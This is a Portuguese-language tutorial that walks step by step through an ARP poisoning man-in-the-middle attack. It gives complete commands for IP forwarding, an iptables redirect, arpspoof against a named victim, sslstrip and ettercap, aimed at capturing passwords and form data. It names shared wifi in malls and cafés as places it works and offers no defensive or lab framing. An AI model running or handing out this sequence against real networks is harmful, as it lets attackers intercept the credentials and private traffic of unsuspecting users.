A exploração do ARP Poisoning é o método mais rápido de se estabelecer no meio da comunicação entre duas máquinas e interceptar as informações enviadas entre ambas, fazendo com que possua acesso a dados confidenciais, senhas e relatórios de tráfego. Esse método se aplica somente em redes Ethernet ou seja, esse tipo de comunicação pode ser resumido em redes internas, sejam elas empresariais, residenciais ou até mesmo aquele wifi livre na praça de alimentação do Shopping ou do café que você gosta de frequentar.
1. Ambiente
Neste exemplo faram parte 3 atores:192.168.1.52 - Máquina atacante com Debian 8 Jessie
192.168.1.57 - Vítima com Windows 8.1, podendo ser qualquer outro sistema operacional, Windows, Linux ou OSX
192.168.1.1. - Roteador como Gateway
2. Preparando o ataque.
Neste exemplo, vamos precisar ficar com 3 terminais abertos.Abra o primeiro terminal. Agora vamos ativar o redirecionamento de pacotes.
# echo 1 > /proc/sys/net/ipv4/ip_forwardAgora vamos efetuar todo o redirecionamento de pacotes que chegar na porta 80 da nossa máquina para a porta 7777
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777Agora vamos ativar o Arpspoof para confundir a tabela ARP da vítima, a sintaxe é a seguinte:
# arpspoof -i INTERFACE -t IP-DA-VITIMA IP-DO-GATEWAY
No nosso caso, como estou efetuando o ataque de uma interface Wireless a sintaxe ficaria
# arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1

Abra outro terminal e como root, digite:
# sslstrip -l 7777Agora colocamos o sslstrip para entrar em modo listening e ouvir tudo que chegar na porta 7777
Abra o terceiro terminal, e como root, digite:
# ettercap -Tq -i wlan0O ettercap é um poderoso sniffer de rede, e ele que vai nos mostrar tudo que passar pela placa wlan0 da nossa máquina. Agora a máquina da vítima está totalmente vigiada, e interceptaremos todos os pacotes que ela enviar para o gateway
Agora vamos aguardar o Host acessar algum site e preencher algum formulário. Lembrando que o Ettercap e o SSLStrip irá capturar tudo, não somente as senhas
